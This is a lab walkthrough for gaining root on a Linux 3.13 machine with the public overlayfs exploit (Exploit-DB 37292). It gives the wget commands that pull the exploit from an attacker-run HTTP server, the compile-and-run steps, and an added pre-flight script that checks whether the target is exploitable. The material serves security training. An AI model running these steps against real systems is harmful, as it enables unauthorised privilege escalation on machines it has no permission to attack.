Kernel Exploits

Step 1: SSH Login to the Target Machine

First, SSH into the target machine.

Step 2: Check the Kernel Version

Since we already know this room is about kernel privilege escalation, the first thing to check is the kernel version running on the target. Running uname -r prints the kernel release string we will search for, and uname -a adds the architecture and build date, which helps narrow the search.

Step 3: Search for Exploits

Now that we have the kernel version, we can search in well-known exploit databases, such as Exploit Database.

Searching for Linux 3.13.0 yields the following result:

  • Exploit found: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation. Two details matter before trusting a hit like this: the version window has to contain our kernel, and the distribution list is not decorative, since this exploit targets Ubuntu's kernel builds. Distribution kernels also backport fixes, so a base version inside the window does not prove the box is still vulnerable; the only conclusive test is running the exploit.

Step 4: Review the Exploit Details

Opening the exploit shows its header comment, which lists the affected versions and the build and run instructions (gcc ofs.c -o ofs, then ./ofs) that we follow in Step 8.

Step 5: Download the Exploit

To use this exploit, download the raw source to the attack machine and then transfer it to the vulnerable machine. Choose a directory of your preference and fetch the raw file with wget. Note that the raw download is saved under the name 37292 with no extension:

wget https://www.exploit-db.com/raw/37292

Step 6: Rename the File and Start the HTTP Server

Next, rename the downloaded file 37292 to ofs.c, and from the same directory start a simple HTTP server to transfer the file to the vulnerable machine:

python -m SimpleHTTPServer 8000

This is the Python 2 module; on an attack machine with only Python 3, the equivalent is python3 -m http.server 8000.

Step 7: Download the Exploit on the Vulnerable Machine

On the vulnerable machine, download into a directory our low-privileged user can write to, such as /tmp; saving into a directory we do not own produces a "Permission denied" error from wget. /tmp is the usual choice, but on hardened hosts it may be mounted noexec, in which case the compiled binary will refuse to run from there and another writable location, such as the user's home directory, is needed. Use the following command:

wget -O /tmp/ofs.c http://<attack_machine_IP>:8000/ofs.c

Breakdown of the Command

  • wget: This is the command-line utility used for downloading files from the web.

  • -O /tmp/ofs.c: The -O option specifies the output file name and path. In this case, it tells wget to save the downloaded file as ofs.c in the /tmp directory. The /tmp directory is often used for temporary files and is typically writable by all users.

  • http://<attack_machine_IP>:8000/ofs.c: This is the URL from which you are downloading the file. It points to the file ofs.c being served by the HTTP server started in Step 6 on the attack machine (10.10.242.118 in this run) on port 8000.

Step 8: Compile and Run the Exploit

Now, change to the /tmp directory and follow the instructions in the exploit header: compile the file and run it. This requires gcc on the target; if it is missing, compile on the attack machine for the same architecture and libc and transfer the resulting binary instead of the source:

gcc ofs.c -o ofs
./ofs

Step 9: Verify Privilege Escalation

After running the exploit we land in a new shell. Running id shows uid=0(root), and whoami confirms it:

id
whoami
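Before copying and building the exploit it is worth confirming that the target actually meets its preconditions. The following pre-flight script is an added example for this write-up, not code from the exploit or the room: it parses the uname -r string into the version window advertised in the exploit title (3.13.0 <= kernel < 3.19), checks for gcc, and finds a directory that is both writable and not mounted noexec by trying to execute a file created there. The candidate directories /tmp, /dev/shm and $HOME are this example's choice.

```shell
#!/bin/sh
# Pre-flight checks before building the overlayfs exploit on the target.
# Added example for this write-up, not part of the exploit itself.
# Assumed: the window 3.13.0 <= kernel < 3.19 comes from the exploit title;
# the candidate directories below are chosen for this example.

# kernel_in_range RELEASE -> exit 0 if RELEASE (as printed by `uname -r`,
# e.g. 3.13.0-24-generic) lies in [3.13.0, 3.19), else 1.
kernel_in_range() {
    ver=${1%%-*}            # drop the "-24-generic" suffix
    major=${ver%%.*}        # "3"
    rest=${ver#*.}          # "13.0"
    minor=${rest%%.*}       # "13"
    # reject empty or non-numeric fields instead of letting `[` error out
    case "$major" in ''|*[!0-9]*) return 1 ;; esac
    case "$minor" in ''|*[!0-9]*) return 1 ;; esac
    [ "$major" -eq 3 ] || return 1
    [ "$minor" -ge 13 ] && [ "$minor" -lt 19 ]
}

# exec_ok DIR -> exit 0 if a file we create in DIR can be executed, i.e. DIR is
# writable and not on a filesystem mounted noexec (where ./ofs would fail with
# "Permission denied" even after a clean compile).
exec_ok() {
    [ -d "$1" ] && [ -w "$1" ] || return 1
    t=$(mktemp "$1/.chk.XXXXXX") || return 1
    printf '#!/bin/sh\nexit 0\n' > "$t"
    chmod 700 "$t"
    "$t" 2>/dev/null
    rc=$?
    rm -f "$t"
    return "$rc"
}

# pick_workdir -> prints the first candidate directory that passes exec_ok.
pick_workdir() {
    for d in /tmp /dev/shm "$HOME"; do
        [ -n "$d" ] || continue
        if exec_ok "$d"; then
            printf '%s\n' "$d"
            return 0
        fi
    done
    return 1
}

# preflight RELEASE -> prints a summary; returns 0 only if all checks pass.
preflight() {
    ok=0
    if kernel_in_range "$1"; then
        echo "[+] kernel $1 is inside the exploit's advertised window"
    else
        echo "[-] kernel $1 is outside 3.13.0 <= v < 3.19"; ok=1
    fi
    if command -v gcc >/dev/null 2>&1; then
        echo "[+] gcc present on target"
    else
        echo "[-] no gcc: build ofs.c on the attack box for the same arch/libc"; ok=1
    fi
    if wd=$(pick_workdir); then
        echo "[+] writable, executable directory: $wd"
    else
        echo "[-] /tmp, /dev/shm and \$HOME are all unwritable or noexec"; ok=1
    fi
    return "$ok"
}

preflight "$(uname -r)"
```

Run it on the target before Step 7; a "[-]" line tells you which precondition to fix (a different download directory, or compiling elsewhere) rather than discovering it from a cryptic "Permission denied" after the transfer. A "[+]" on the kernel line is still only a version match, for the backport reason given in Step 3.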

Step 10: Access the Flag

To retrieve the flag, change to the /home/matt directory and cat flag1.txt.

Had we tried cat flag1.txt as our original user before the exploit, we would have received a "Permission denied" message, since the file is readable only by root.

This write-up demonstrates the impact of an outdated kernel: the credentials of an unprivileged user, combined with a known local privilege escalation that had been public for years, were enough to reach root. It highlights the importance of keeping systems updated and patched against known vulnerabilities, and the risk of running software whose exploits are a single search away.